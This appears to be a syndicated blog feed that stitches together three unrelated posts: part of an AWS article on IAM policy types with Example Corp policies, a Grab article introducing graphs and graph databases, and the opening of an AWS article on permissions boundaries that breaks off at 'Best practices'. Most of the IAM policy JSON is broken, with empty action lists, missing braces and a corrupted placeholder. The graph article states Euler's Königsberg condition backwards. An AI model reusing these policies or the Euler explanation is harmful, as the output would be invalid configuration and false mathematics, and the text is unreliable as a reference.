The Central Cloud Team chooses to implement these security invariants using SCPs and applies the SCPs to the root of the organization. The first statement in Policy 1 denies all requests that are not sent using SSL (TLS). The second statement in Policy 1 prevents an account from leaving the organization.

This is only a subset of the SCP statements that Example Corp uses. Example Corp uses a deny list strategy, and there must also be an accompanying statement with an Effect of Allow at every level of the organization that isn’t shown in the SCP in Policy 1.

Policy 1: SCP attached to AWS Organizations organization root

    "Id": "ServiceControlPolicy",
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "DenyIfRequestIsNotUsingSSL",    
        "Effect": "Deny",    
        "Action": "*",    
        "Resource": "*",    
        "Condition": {
            "BoolIfExists": {
                "aws:SecureTransport": "false"        
        "Sid": "PreventLeavingTheOrganization",
        "Effect": "Deny",
        "Action": "organizations:LeaveOrganization",
        "Resource": "*"

Permissions boundary policies

The Central Cloud Team wants to make sure that they don’t become a bottleneck for the Application Team. They want to allow the Application Team to deploy their own IAM principals and policies for their applications. The Central Cloud Team also wants to make sure that any principals created by the Application Team can only use AWS APIs that the Central Cloud Team has approved.

At Example Corp, the Application Team deploys to their production AWS environment through a continuous integration/continuous deployment (CI/CD) pipeline. The pipeline itself has broad access to create AWS resources needed to run applications, including permissions to create additional IAM roles. The Central Cloud Team implements a control that requires that all IAM roles created by the pipeline must have a permissions boundary attached. This allows the pipeline to create additional IAM roles, but limits the permissions that the newly created roles can have to what is allowed by the permissions boundary. This delegation strikes a balance for the Central Cloud Team. They can avoid becoming a bottleneck to the Application Team by allowing the Application Team to create their own IAM roles and policies, while ensuring that those IAM roles and policies are not overly privileged.

An example of the permissions boundary policy that the Central Cloud Team attaches to IAM roles created by the CI/CD pipeline is shown below. This same permissions boundary policy can be centrally managed and attached to IAM roles created by other pipelines at Example Corp. The policy describes the maximum possible permissions that additional roles created by the Application Team are allowed to have, and it limits those permissions to some Amazon S3 and Amazon Simple Queue Service (Amazon SQS) data access actions. It’s common for a permissions boundary policy to include data access actions when used to delegate role creation. This is because most applications only need permissions to read and write data (for example, writing an object to an S3 bucket or reading a message from an SQS queue) and only sometimes need permission to modify infrastructure (for example, creating an S3 bucket or deleting an SQS queue). As Example Corp adopts additional AWS services, the Central Cloud Team updates this permissions boundary with actions from those services.

Policy 2: Permissions boundary policy attached to IAM roles created by the CI/CD pipeline

    "Id": "PermissionsBoundaryPolicy",
    "Version": "2012-10-17",
    "Statement": [{   
        "Effect": "Allow",    
        "Action": [
        "Resource": "*"

In the next section, you will learn how to enforce that this permissions boundary is attached to IAM roles created by your CI/CD pipeline.

Identity-based policies

In this example, teams at Example Corp are only allowed to modify the production AWS environment through their CI/CD pipeline. Write access to the production environment is not allowed otherwise. To support the different personas that need to have access to an application account in Example Corp, three baseline IAM roles with identity-based policies are created in the application accounts:

  • A role for the CI/CD pipeline to use to deploy application resources.
  • A read-only role for the Central Cloud Team, with a process for temporary elevated access.
  • A read-only role for members of the Application Team.

All three of these baseline roles are owned, managed, and deployed by the Central Cloud Team.

The Central Cloud Team is given a default read-only role (CentralCloudTeamReadonlyRole) that allows read access to all resources within the account. This is accomplished by attaching the AWS managed ReadOnlyAccess policy to the Central Cloud Team role. You can use the IAM console to attach the ReadOnlyAccess policy, which grants read-only access to all services. When a member of the team needs to perform an action that is not covered by this policy, they follow a temporary elevated access process to make sure that this access is valid and recorded.

A read-only role is also given to developers in the Application Team (DeveloperReadOnlyRole) for analysis and troubleshooting. At Example Corp, developers are allowed to have read-only access to Amazon EC2, Amazon S3, Amazon SQS, AWS CloudFormation, and Amazon CloudWatch. Your requirements for read-only access might differ. Several AWS services offer their own read-only managed policies, and there is also the previously mentioned AWS managed ReadOnlyAccess policy that grants read only access to all services. To customize read-only access in an identity-based policy, you can use the AWS managed policies as a starting point and limit the actions to the services that your organization uses. The customized identity-based policy for Example Corp’s DeveloperReadOnlyRole role is shown below.

Policy 3: Identity-based policy attached to a developer read-only role to support human access and troubleshooting

    "Id": "DeveloperRoleBaselinePolicy",
    "Version": "2012-10-17",
    "Statement": [
            "Effect": "Allow",
            "Action": [
            "Resource": "*"

The CI/CD pipeline role has broad access to the account to create resources. Access to deploy through the CI/CD pipeline should be tightly controlled and monitored. The CI/CD pipeline is allowed to create new IAM roles for use with the application, but those roles are limited to only the actions allowed by the previously discussed permissions boundary. The roles, policies, and EC2 instance profiles that the pipeline creates should also be restricted to specific role paths. This enables you to enforce that the pipeline can only modify roles and policies or pass roles that it has created. This helps prevent the pipeline, and roles created by the pipeline, from elevating privileges by modifying or passing a more privileged role. Pay careful attention to the role and policy paths in the Resource element of the following CI/CD pipeline role policy (Policy 4). The CI/CD pipeline role policy also provides some example statements that allow the passing and creation of a limited set of service-linked roles (which are created in the path /aws-service-role/). You can add other service-linked roles to these statements as your organization adopts additional AWS services.

Policy 4: Identity-based policy attached to CI/CD pipeline role

    "Id": "CICDPipelineBaselinePolicy",
    "Version": "2012-10-17",
    "Statement": [{
        "Effect": "Allow",    
        "Action": [
        "Resource": "*"
        "Effect": "Allow",
        "Action": "ssm:GetParameter*",
        "Resource": "arn:aws:ssm:*::parameter/aws/service/*"
        "Effect": "Allow",
        "Action": [
        "Resource": "arn:aws:iam::111111111111:role/application-roles/*",
        "Condition": {
            "ArnEquals": {
                "iam:PermissionsBoundary": "arn:aws:iam::111111111111:policy/PermissionsBoundary"
        "Effect": "Allow",
        "Action": [
        "Resource": "arn:aws:iam::111111111111:role/application-roles/*",
        "Condition": {
            "ArnEquals": {
                "iam:PermissionsBoundary": "arn:aws:iam::111111111111:policy/PermissionsBoundary"
            "ArnLike": {
                "iam:PolicyARN": "arn:aws:iam::111111111111:policy/application-role-policies/*"
        "Effect": "Allow",
        "Action": [
        "Resource": "arn:aws:iam::111111111111:role/application-roles/*"
        "Effect": "Allow",
        "Action": [
        "Resource": "arn:aws:iam::111111111111:policy/application-role-policies/*"
        "Effect": "Allow",
        "Action": [
        "Resource": "arn:aws:iam::111111111111:instance-profile/application-instance-profiles/*"
        "Effect": "Allow",
        "Action": "iam:PassRole",
        "Resource": [
        "Effect": "Allow",
        "Action": "iam:CreateServiceLinkedRole",
        "Resource": "arn:aws:iam::111111111111:role/aws-service-role/*",
        "Condition": {
            "StringEquals": {
                "iam:AWSServiceName": "autoscaling.amazonaws.com"
        "Effect": "Allow",
        "Action": [
        "Resource": "arn:aws:iam::111111111111:role/aws-service-role/autoscaling.amazonaws.com/AWSServiceRoleForAutoScaling*"
        "Effect": "Allow",
        "Action": "iam:ListRoles",
        "Resource": "*"
        "Effect": "Allow",
        "Action": "iam:GetRole",
        "Resource": [

In addition to the three baseline roles with identity-based policies in place that you’ve seen so far, there’s one additional IAM role that the Application Team creates using the CI/CD pipeline. This is the role that the application running on the EC2 instance will use to get and put objects from the S3 buckets in Figure 1. Explicit ownership allows the Application Team to create this identity-based policy that fits their needs without having to wait and depend on the Central Cloud Team. Because the CI/CD pipeline can only create roles that have the permissions boundary policy attached, Policy 5 cannot grant more access than the permissions boundary policy allows (Policy 2).

If you compare the identity-based policy attached to the EC2 instance’s role (Policy 5 on left) with the permissions boundary policy described previously (Policy 2 on the right), you can see that the actions allowed by the EC2 instance’s role are also allowed by the permissions boundary policy. Actions must be allowed by both policies for the EC2 instance to perform the s3:GetObject and s3:PutObject actions. Access to create a bucket would be denied even if the role attached to the EC2 instance was given permission to perform the s3:CreateBucket action because the s3:CreateBucket action exceeds the permissions allowed by the permissions boundary.

Policy 5: Identity-based policy bound by permissions boundary and attached to the application’s EC2 instance

"Id": "ApplicationRolePolicy",
"Version": "2012-10-17",
"Statement": [{   
 "Effect": "Allow",    
 "Action": [
 "Resource": "arn:aws:s3:::DOC-EXAMPLE-
 "Effect": "Allow",    
 "Action": [
 "Resource": "arn:aws:s3:::DOC-EXAMPLE-

Policy 2: Permissions boundary policy attached to IAM roles created by the CI/CD pipeline.

    "Id": "PermissionsBoundaryPolicy"
    "Version": "2012-10-17",
    "Statement": [{   
        "Effect": "Allow",    
        "Action": [
        "Resource": "*"

Resource-based policies

The only resource-based policy needed in this example is attached to the bucket in the account external to the application account (DOC-EXAMPLE-BUCKET2 in the data lake account in Figure 1). Both the identity-based policy and resource-based policy must grant access to an action on the S3 bucket for access to be allowed in a cross-account scenario. The bucket policy below only allows the GetObject action to be performed on the bucket, regardless of what permissions the application’s role (ApplicationRole) is granted from its identity-based policy (Policy 5).

This resource-based policy is owned by the Data Lake Team that owns and manages the data lake account (222222222222) and the policy (Policy 6). This allows the Data Lake Team to have complete control over what teams external to their AWS account can access their S3 bucket.

Policy 6: Resource-based policy attached to S3 bucket in external data lake account (222222222222)

    "Version": "2012-10-17",
    "Statement": [{
        "Principal": {
            "AWS": "arn:aws:iam::111111111111:role/application-roles/ApplicationRole"
        "Effect": "Allow",    
        "Action": [
        "Resource": "arn:aws:s3:::DOC-EXAMPLE-BUCKET2/*"

No resource-based policy is needed on the S3 bucket in the application account (DOC-EXAMPLE-BUCKET1 in Figure 1). Access for the application is granted to the S3 bucket in the application account by the identity-based policy on its own. Access can be granted by either an identity-based policy or a resource-based policy when access is within the same AWS account.

Putting it all together

Figure 2 shows the architecture and includes the seven different policies and the resources they are attached to. The table that follows summarizes the various IAM policies that are deployed to the Example Corp AWS environment, and specifies what team is responsible for each of the policies.

Figure 2: Sample application architecture with CI/CD pipeline used to deploy infrastructure

Figure 2: Sample application architecture with CI/CD pipeline used to deploy infrastructure

The numbered policies in Figure 2 correspond to the policy numbers in the following table.

Policy number Policy description Policy type Policy owner Attached to
1 Enforce SSL and prevent member accounts from leaving the organization for all principals in the organization Service control policy (SCP) Central Cloud Team Organization root
2 Restrict maximum permissions for roles created by CI/CD pipeline Permissions boundary Central Cloud Team All roles created by the pipeline (ApplicationRole)
3 Scoped read-only policy Identity-based policy Central Cloud Team DeveloperReadOnlyRole IAM role
4 CI/CD pipeline policy Identity-based policy Central Cloud Team CICDPipelineRole IAM role
5 Policy used by running application to read and write to S3 buckets Identity-based policy Application Team ApplicationRole on EC2 instance
6 Bucket policy in data lake account that grants access to a role in application account Resource-based policy Data Lake Team S3 Bucket in data lake account
7 Broad read-only policy Identity-based policy Central Cloud Team CentralCloudTeamReadonlyRole IAM role


In this blog post, you learned about four different policy types: identity-based policies, resource-based policies, service control policies (SCPs), and permissions boundary policies. You saw examples of situations where each policy type is commonly applied. Then, you walked through a real-life example that describes an implementation that uses these policy types.

You can use this blog post as a starting point for developing your organization’s IAM strategy. You might decide that you don’t need all of the policy types explained in this post, and that’s OK. Not every organization needs to use every policy type. You might need to implement policies differently in a production environment than a sandbox environment. The important concepts to take away from this post are the situations where each policy type is applicable, and the importance of explicit policy ownership. We also recommend taking advantage of policy validation in AWS IAM Access Analyzer when writing IAM policies to validate your policies against IAM policy grammar and best practices.

For more information, including the policies described in this solution and the sample application, see the how-and-when-to-use-aws-iam-policy-blog-samples GitHub respository. The repository walks through an example implementation using a CI/CD pipeline with AWS CodePipeline.

If you have any questions, please post them in the AWS Identity and Access Management re:Post topic or reach out to AWS Support.

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Matt Luttrell

Matt is a Sr. Solutions Architect on the AWS Identity Solutions team. When he’s not spending time chasing his kids around, he enjoys skiing, cycling, and the occasional video game.

Josh Joy

Josh is a Senior Identity Security Engineer with AWS Identity helping to ensure the safety and security of AWS Auth integration points. Josh enjoys diving deep and working backwards in order to help customers achieve positive outcomes. 

Graph concepts and applications

Post Syndicated from Grab Tech original https://engineering.grab.com/graph-concepts


In an introductory article, we talked about the importance of Graph Networks in fraud detection. In this article, we will be adding some further context on graphs, graph technology and some common use cases.

Connectivity is the most prominent feature of today’s networks and systems. From molecular interactions, social networks and communication systems to power grids, shopping experiences or even supply chains, networks relating to real-world systems are not random. This means that these connections are not static and can be displayed differently at different times. Simple statistical analysis is insufficient to effectively characterise, let alone forecast, networked system behaviour.

As the world becomes more interconnected and systems become more complex, it is more important to employ technologies that are built to take advantage of relationships and their dynamic properties. There is no doubt that graphs have sparked a lot of attention because they are seen as a means to get insights from related data. Graph theory-based approaches show the concepts underlying the behaviour of massively complex systems and networks.

What are graphs?

Graphs are mathematical models frequently used in network science, which is a set of technological tools that may be applied to almost any subject. To put it simply, graphs are mathematical representations of complex systems.

Origin of graphs

The first graph was produced in 1736 in the city of Königsberg, now known as Kaliningrad, Russia. In this city, there were two islands with two mainland sections that were connected by seven different bridges.

Famed mathematician Euler wanted to plot a journey through the entire city by crossing each bridge only once. Euler proceeded to abstract the four regions of the city and the seven bridges into edges but he demonstrated that the problem was unsolvable. A simplified abstract graph is shown in Fig 1.

Fig 1 Abstraction graph

The graph’s four dots represent Königsberg’s four zones, while the lines represent the seven bridges that connect them. Zones connected by an even number of bridges is clearly navigable because several paths to enter and exit are available. Zones connected by an odd number of bridges can only be used as starting or terminating locations because the same route can only be taken once.

The number of edges associated with a node is known as the node degree. If two nodes have odd degrees and the rest have even degrees, the Königsberg problem could be solved. For example, exactly two regions must have an even number of bridges while the rest have an odd number of bridges. However, as illustrated in Fig 1, no Königsberg location has an even number of bridges, rendering this problem unsolvable.

Definition of graphs

A graph is a structure that consists of vertices and edges. Vertices, or nodes, are the objects in a problem, while edges are the links that connect vertices in a graph.  

Vertices are the fundamental elements that a graph requires to function; there should be at least one in a graph. Vertices are mathematical abstractions that refer to objects that are linked by a condition.

On the other hand, edges are optional as graphs can still be defined without any edges. An edge is a link or connection between any two vertices in a graph, including a connection between a vertex and itself. The idea is that if two vertices are present, there is a relationship between them.

We usually indicate V={v1, v2, …, vn} as the set of vertices, and E = {e1, e2, …, em} as the set of edges. From there, we can define a graph G as a structure G(V, E) which models the relationship between the two sets:

Fig 2 Graph structure

It is worth noting that the order of the two sets within parentheses matters, because we usually express the vertices first, followed by the edges. A graph H(X, Y) is therefore a structure that models the relationship between the set of vertices X and the set of edges Y, not the other way around.

Graph data model

Now that we have covered graphs and their typical components, let us move on to graph data models, which help to translate a conceptual view of your data to a logical model. Two common graph data formats are Resource Description Framework (RDF) and Labelled Property Graph (LPG).

Resource Description Framework (RDF)

RDF is typically used for metadata and facilitates standardised exchange of data based on their relationships. RDFs typically consist of a triple: a subject, a predicate, and an object. A collection of such triples is an RDF graph. This can be depicted as a node and a directed edge diagram, with each triple representing a node-edge-node graph, as shown in Fig 3.

Fig 3 RDF graph

The three types of nodes that can exist are:

  • Internationalised Resource Identifiers (IRI) – online resource identification code.
  • Literals – data type value, i.e. text, integer, etc.
  • Blank nodes – have no identification; similar to anonymous or existential variables.

Let us use an example to illustrate this. We have a person with the name Art and we want to plot all his relationships. In this case, the IRI is http://example.org/art and this can be shortened by defining a prefix like ex.

In this example, the IRI http://xmlns.com/foaf/0.1/knows defines the relationship knows. We define foaf as the prefix for http://xmlns.com/foaf/0.1/. The following code snippet shows how a graph like this will look.

@prefix foaf: <http://xmlns.com/foaf/0.1/>
@prefix ex: <http://example.org/>

ex:art foaf:knows ex:bob
ex:art foaf:knows ex:bea
ex:bob foaf:knows ex:cal
ex:bob foaf:knows ex:cam
ex:bea foaf:knows ex:coe
ex:bea foaf:knows ex:cory
ex:bea foaf:age 23
ex:bea foaf:based_near_:o1

In the last two lines, you can see how a literal and blank node would be depicted in an RDF graph. The variable foaf:age is a literal node with the integer value of 23, while foaf:based_near is an anonymous spatial entity with a node identifier of underscore. Outside the context of this graph, o1 is a data identifier with no meaning.

Multiple IRIs, intended for use in RDF graphs, are typically stored in an RDF vocabulary. These IRIs often begin with a common substring known as a namespace IRI. In some cases, namespace IRIs are also associated with a short name known as a namespace prefix. In the example above, http://xmlns.com/foaf/0.1/ is the namespace IRI and foaf and ex are namespace prefixes.

Note: RDF graphs are considered atemporal as they provide a static snapshot of data. They can use appropriate language extensions to communicate information about events or other dynamic properties of entities.

An RDF dataset is a set of RDF graphs that includes one or more named graphs as well as exactly one default graph. A default graph is one that can be empty, and has no associated IRI or name, while each named graph has an IRI or a blank node corresponding to the RDF graph and its name. If there is no named graph specified in a query, the default graph is queried (hence its name).

Labelled Property Graph (LPG)

A labelled property graph is made up of nodes, links, and properties. Each node is given a label and a set of characteristics in the form of arbitrary key-value pairs. The keys are strings, and the values can be any data type. A relationship is then defined by adding a directed edge that is labelled and connects two nodes with a set of properties.

In Fig 4, we have an LPG that shows two nodes: art and bea. The bea node has two characteristics, age and proximity, that are connected by a known edge. This edge has the attribute since because it commemorates the year that art and bea first met.

Fig 4 Labelled Property Graph: Example 1

Nodes, edges and properties must be defined when designing an LPG data model. In this scenario, based_near might not be applicable to all vertices, but they should be defined. You might be wondering, why not represent the city Seattle as a node and add an edge marked as based_near that connects a person and the city?

In general, if there is a value linked to a large number of other nodes in the network and it requires additional properties to correlate  with other nodes, it should be represented as a node. In this scenario, the architecture defined in Fig 5 is more appropriate for traversing based_near connections. It also gives us the ability to link any new attributes to the based_near relationship.

Fig 5 Labelled Property Graph: Example 2

Now that we have the context of graphs, let us talk about graph databases, how they help with large data queries and the part they play in Graph Technology.

Graph database

A graph database is a type of NoSQL database that stores data using network topology. The idea is derived from LPG, which represents data sets with vertices, edges, and attributes.

  • Vertices are instances or entities of data that represent any object to be tracked, such as people, accounts, locations, etc.
  • Edges are the critical concepts in graph databases which represent relationships between vertices. The connections have a direction that can be unidirectional (one-way) or bidirectional (two-way).
  • Properties represent descriptive information associated with vertices. In some cases, edges have properties as well.

Graph databases provide a more conceptual view of data that is closer to reality. Modelling complex linkages becomes simpler because interconnections between data points are given the same weight as the data itself.

Graph database vs. relational database

Relational databases are currently the industry norm and take a structured approach to data, usually in the form of tables. On the other hand, graph databases are agile and focus on immediate relationship understanding. Neither type is designed to replace the other, so it is important to know what each database type has to offer.

Fig 6 Graph database vs relational database

There is a domain for both graph and relational databases. Graph databases outperform typical relational databases, especially in use cases involving complicated relationships, as they take a more naturalistic and flowing approach to data.

The key distinctions between graph and relational databases are summarised in the following table:

Type Graph Relational
Format Nodes and edges with properties Tables with rows and columns
Relationships Represented with edges between nodes Created using foreign keys between tables
Flexibility Flexible Rigid
Complex queries Quick and responsive Requires complex joins
Use case Systems with highly connected relationships Transaction focused systems with more straightforward relationships

Table. 1 Graph vs. Relational Databases

Advantages and disadvantages

Every database type has its advantages and disadvantages; knowing the distinctions as well as potential options for specific challenges is crucial. Graph databases are a rapidly evolving technology with improved functions compared with other database types.


Some advantages of graph databases include:

  • Agile and flexible structures.
  • Explicit relationship representation between entities.
  • Real-time query output – speed depends on the number of relationships.


The general disadvantages of graph databases are:

  • No standardised query language; depends on the platform used.
  • Not suitable for transactional-based systems.
  • Small user base, making it hard to find troubleshooting support.

Graph technology

Graph technology is the next step in improving analytics delivery. Traditional analytics is insufficient to meet complicated business operations, distribution, and analytical concerns as data quantities expand.

Graph technology aids in the discovery of unknown correlations in data that would otherwise go undetected or unanalysed. When the term graph is used to describe a topic, three distinct concepts come to mind: graph theory, graph analytics, and graph data management.

  • Graph theory – A mathematical notion that uses stack ordering to find paths, linkages, and networks of logical or physical objects, as well as their relationships. Can be used to model molecules, telephone lines, transport routes, manufacturing processes, and many other things.
  • Graph analytics – The application of graph theory to uncover nodes, edges, and data linkages that may be assigned semantic attributes. Can examine potentially interesting connections in data found in traditional analysis solutions, using node and edge relationships.
  • Graph database – A type of storage for data generated by graph analytics. Filling a knowledge graph, which is a model in data that indicates a common usage of acquired knowledge or data sets expressing a frequently held notion, is a typical use case for graph analytics output.

While the architecture and terminology are sometimes misunderstood, graph analytics’ output can be viewed through visualisation tools, knowledge graphs, particular applications, and even some advanced dashboard capabilities of business intelligence tools. All three concepts above are frequently used to improve system efficiency and even to assist in dynamic data management. In this approach, graph theory and analysis are inextricably linked, and analysis may always rely on graph databases.

Graph-centric user stories

Fraud detection

Traditional fraud prevention methods concentrate on discrete data points such as individual accounts, devices, or IP addresses. However, today’s sophisticated fraudsters avoid detection by building fraud rings using stolen and fake identities. To detect such fraud rings, we need to look beyond individual data points to the linkages that connect them.

Graph technology greatly transcends the capabilities of a relational database, by revealing hard-to-find patterns. Enterprise businesses also employ Graph technology to supplement their existing fraud detection skills to tackle a wide range of financial crimes, including first-party bank fraud, fraud, and money laundering.

Real-time recommendations

An online business’s success depends on systems that can generate meaningful recommendations in real time. To do so, we need the capacity to correlate product, customer, inventory, supplier, logistical, and even social sentiment data in real time. Furthermore, a real-time recommendation engine must be able to record any new interests displayed during the consumer’s current visit in real time, which batch processing cannot do.

Graph databases outperform relational and other NoSQL data stores in terms of delivering real-time suggestions. Graph databases can easily integrate different types of data to get insights into consumer requirements and product trends, making them an increasingly popular alternative to traditional relational databases.

Supply chain management

With complicated scenarios like supply chains, there are many different parties involved and companies need to stay vigilant in detecting issues like fraud, contamination, high-risk areas or unknown product sources. This means that there is a need to efficiently process large amounts of data and ensure transparency throughout the supply chain.

To have a transparent supply chain, relationships between each product and party need to be mapped out, which means there will be deep linkages. Graph databases are great for these as they are designed to search and analyse data with deep links. This means they can process enormous amounts of data without performance issues.

Identity and access management

Managing multiple changing roles, groups, products and authorisations can be difficult, especially in large organisations. Graph technology integrates your data and allows quick and effective identity and access control. It also allows you to track all identity and access authorisations and inheritances with significant depth and real-time insights.

Network and IT operations

Because of the scale and complexity of network and IT infrastructure, you need a configuration management database (CMDB) that is far more capable than relational databases. Neptune is an example of a CMDB and graph database that allows you to correlate your network, data centre, and IT assets to aid troubleshooting, impact analysis, and capacity or outage planning.

A graph database allows you to integrate various monitoring tools and acquire important insights into the complicated relationships that exist between various network or data centre processes. Possible applications of graphs in network and IT operations range from dependency management to automated microservice monitoring.

Risk assessment and monitoring

Risk assessment is crucial in the fintech business. With multiple sources of credit data such as ecommerce sites, mobile wallets and loan repayment records, it can be difficult to accurately assess an individual’s credit risk. Graph Technology makes it possible to combine these data sources, quantify an individual’s fraud risk and even generate full credit reviews.

One clear example of this is IceKredit, which employs artificial intelligence (AI) and machine learning (ML) techniques to make better risk-based decisions. With Graph technology, IceKredit has also successfully detected unreported links and increased efficiency of financial crime investigations.

Social network

Whether you’re using stated social connections or inferring links based on behaviour, social graph databases like Neptune introduce possibilities for building new social networks or integrating existing social graphs into commercial applications.

Having a data model that is identical to your domain model allows you to better understand your data, communicate more effectively, and save time. By decreasing the time spent data modelling, graph databases increase the quality and speed of development for your social network application.

Artificial intelligence (AI) and machine learning (ML)

AI and ML use statistical and analytical approaches to find patterns in data and provide insights. However, there are two prevalent concerns that arise – the quality of data and effectiveness of the analytics. Some AI and ML solutions have poor accuracy because there is not enough training data or variants that have a high correlation to the outcome.

These ML data issues can be solved with graph databases as it’s possible to connect and traverse links, as well as supplement raw data. With Graph technology, ML systems can recognise each column as a “feature” and each connection as a distinct characteristic, and then be able to identify data patterns and train themselves to recognise these relationships.


Graphs are a great way to visually represent complex systems and can be used to easily detect patterns or relationships between entities. To help improve graphs’ ability to detect patterns early, businesses should consider using Graph technology, which is the next step in improving analytics delivery.

Graph technology typically consists of:

  • Graph theory – Used to find paths, linkages and networks of logical or physical objects.
  • Graph analytics – Application of graph theory to uncover nodes, edges, and data linkages.
  • Graph database – Storage for data generated by graph analytics.

Although predominantly used in fraud detection, Graph technology has many other use cases such as making real-time recommendations based on consumer behaviour, identity and access control, risk assessment and monitoring, AI and ML, and many more.

Check out our next blog article, where we will be talking about how our Graph Visualisation Platform enhances Grab’s fraud detection methods.


  1. https://www.baeldung.com/cs/graph-theory-intro
  2. https://web.stanford.edu/class/cs520/2020/notes/What_Are_Graph_Data_Models.html

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Grab is the leading superapp platform in Southeast Asia, providing everyday services that matter to consumers. More than just a ride-hailing and food delivery app, Grab offers a wide range of on-demand services in the region, including mobility, food, package and grocery delivery services, mobile payments, and financial services across 428 cities in eight countries.

Powered by technology and driven by heart, our mission is to drive Southeast Asia forward by creating economic empowerment for everyone. If this mission speaks to you, join our team today!

When and where to use IAM permissions boundaries

Post Syndicated from Umair Rehmat original https://aws.amazon.com/blogs/security/when-and-where-to-use-iam-permissions-boundaries/

Customers often ask for guidance on permissions boundaries in AWS Identity and Access Management (IAM) and when, where, and how to use them. A permissions boundary is an IAM feature that helps your centralized cloud IAM teams to safely empower your application developers to create new IAM roles and policies in Amazon Web Services (AWS). In this blog post, we cover this common use case for permissions boundaries, some best practices to consider, and a few things to avoid.


Developers often need to create new IAM roles and policies for their applications because these applications need permissions to interact with AWS resources. For example, a developer will likely need to create an IAM role with the correct permissions for an Amazon Elastic Compute Cloud (Amazon EC2) instance to report logs and metrics to Amazon CloudWatch. Similarly, a role with accompanying permissions is required for an AWS Glue job to extract, transform, and load data to an Amazon Simple Storage Service (Amazon S3) bucket, or for an AWS Lambda function to perform actions on the data loaded to Amazon S3.

Before the launch of IAM permissions boundaries, central admin teams, such as identity and access management or cloud security teams, were often responsible for creating new roles and policies. But using a centralized team to create and manage all IAM roles and policies creates a bottleneck that doesn’t scale, especially as your organization grows and your centralized team receives an increasing number of requests to create and manage new downstream roles and policies. Imagine having teams of developers deploying or migrating hundreds of applications to the cloud—a centralized team won’t have the necessary context to manually create the permissions for each application themselves.

Because the use case and required permissions can vary significantly between applications and workloads, customers asked for a way to empower their developers to safely create and manage IAM roles and policies, while having security guardrails in place to set maximum permissions. IAM permissions boundaries are designed to provide these guardrails so that even if your developers created the most permissive policy that you can imagine, such broad permissions wouldn’t be functional.

By setting up permissions boundaries, you allow your developers to focus on tasks that add value to your business, while simultaneously freeing your centralized security and IAM teams to work on other critical tasks, such as governance and support. In the following sections, you will learn more about permissions boundaries and how to use them.

Permissions boundaries

A permissions boundary is designed to restrict permissions on IAM principals, such as roles, such that permissions don’t exceed what was originally intended. The permissions boundary uses an AWS or customer managed policy to restrict access, and it’s similar to other IAM policies you’re familiar with because it has resource, action, and effect statements. A permissions boundary alone doesn’t grant access to anything. Rather, it enforces a boundary that can’t be exceeded, even if broader permissions are granted by some other policy attached to the role. Permissions boundaries are a preventative guardrail, rather than something that detects and corrects an issue. To grant permissions, you use resource-based policies (such as S3 bucket policies) or identity-based policies (such as managed or in-line permissions policies).

The predominant use case for permissions boundaries is to limit privileges available to IAM roles created by developers (referred to as delegated administrators in the IAM documentation) who have permissions to create and manage these roles. Consider the example of a developer who creates an IAM role that can access all Amazon S3 buckets and Amazon DynamoDB tables in their accounts. If there are sensitive S3 buckets in these accounts, then these overly broad permissions might present a risk.

To limit access, the central administrator can attach a condition to the developer’s identity policy that helps ensure that the developer can only create a role if the role has a permissions boundary policy attached to it. The permissions boundary, which AWS enforces during authorization, defines the maximum permissions that the IAM role is allowed. The developer can still create IAM roles with permissions that are limited to specific use cases (for example, allowing specific actions on non-sensitive Amazon S3 buckets and DynamoDB tables), but the attached permissions boundary prevents access to sensitive AWS resources even if the developer includes these elevated permissions in the role’s IAM policy. Figure 1 illustrates this use of permissions boundaries.

Figure 1: Implementing permissions boundaries

Figure 1: Implementing permissions boundaries

  1. The central IAM team adds a condition to the developer’s IAM policy that allows the developer to create a role only if a permissions boundary is attached to the role.
  2. The developer creates a role with accompanying permissions to allow access to an application’s Amazon S3 bucket and DynamoDB table. As part of this step, the developer also attaches a permissions boundary that defines the maximum permissions for the role.
  3. Resource access is granted to the application’s resources.
  4. Resource access is denied to the sensitive S3 bucket.

You can use the following policy sample for your developers to allow the creation of roles only if a permissions boundary is attached to them. Make sure to replace <YourAccount_ID> with an appropriate AWS account ID; and the <DevelopersPermissionsBoundary>, with your permissions boundary policy.

   "Effect": "Allow",
   "Action": "iam:CreateRole",
   "Condition": {
      "StringEquals": {
         "iam:PermissionsBoundary": "arn:aws:iam::<YourAccount_ID&gh;:policy/<DevelopersPermissionsBoundary>"

You can also deny deletion of a permissions boundary, as shown in the following policy sample.

   "Effect": "Deny",
   "Action": "iam:DeleteRolePermissionsBoundary"

You can further prevent detaching, modifying, or deleting the policy that is your permissions boundary, as shown in the following policy sample.

   "Effect": "Deny", 
   "Action": [

Put together, you can use the following permissions policy for your developers to get started with permissions boundaries. This policy allows your developers to create downstream roles with an attached permissions boundary. The policy further denies permissions to detach, delete, or modify the attached permissions boundary policy. Remember, nothing is implicitly allowed in IAM, so you need to allow access permissions for any other actions that your developers require. To learn about allowing access permissions for various scenarios, see Example IAM identity-based policies in the documentation.

   "Version": "2012-10-17",
   "Statement": [
         "Sid": "AllowRoleCreationWithAttachedPermissionsBoundary",
   "Effect": "Allow",
   "Action": "iam:CreateRole",
   "Resource": "*",
   "Condition": {
      "StringEquals": {
         "iam:PermissionsBoundary": "arn:aws:iam::<YourAccount_ID>:policy/<DevelopersPermissionsBoundary>"
   "Sid": "DenyPermissionsBoundaryDeletion",
   "Effect": "Deny",
   "Action": "iam:DeleteRolePermissionsBoundary",
   "Resource": "*",
   "Condition": {
      "StringEquals": {
         "iam:PermissionsBoundary": "arn:aws:iam::<YourAccount_ID>:policy/<DevelopersPermissionsBoundary>"
   "Sid": "DenyPolicyChange",
   "Effect": "Deny", 
   "Action": [

Permissions boundaries at scale

You can build on these concepts and apply permissions boundaries to different organizational structures and functional units. In the example shown in Figure 2, the developer can only create IAM roles if a permissions boundary associated to the business function is attached to the IAM roles. In the example, IAM roles in function A can only perform Amazon EC2 actions and Amazon DynamoDB actions, and they don’t have access to the Amazon S3 or Amazon Relational Database Service (Amazon RDS) resources of function B, which serve a different use case. In this way, you can make sure that roles created by your developers don’t exceed permissions outside of their business function requirements.

Figure 2: Implementing permissions boundaries in multiple organizational functions

Figure 2: Implementing permissions boundaries in multiple organizational functions

Best practices

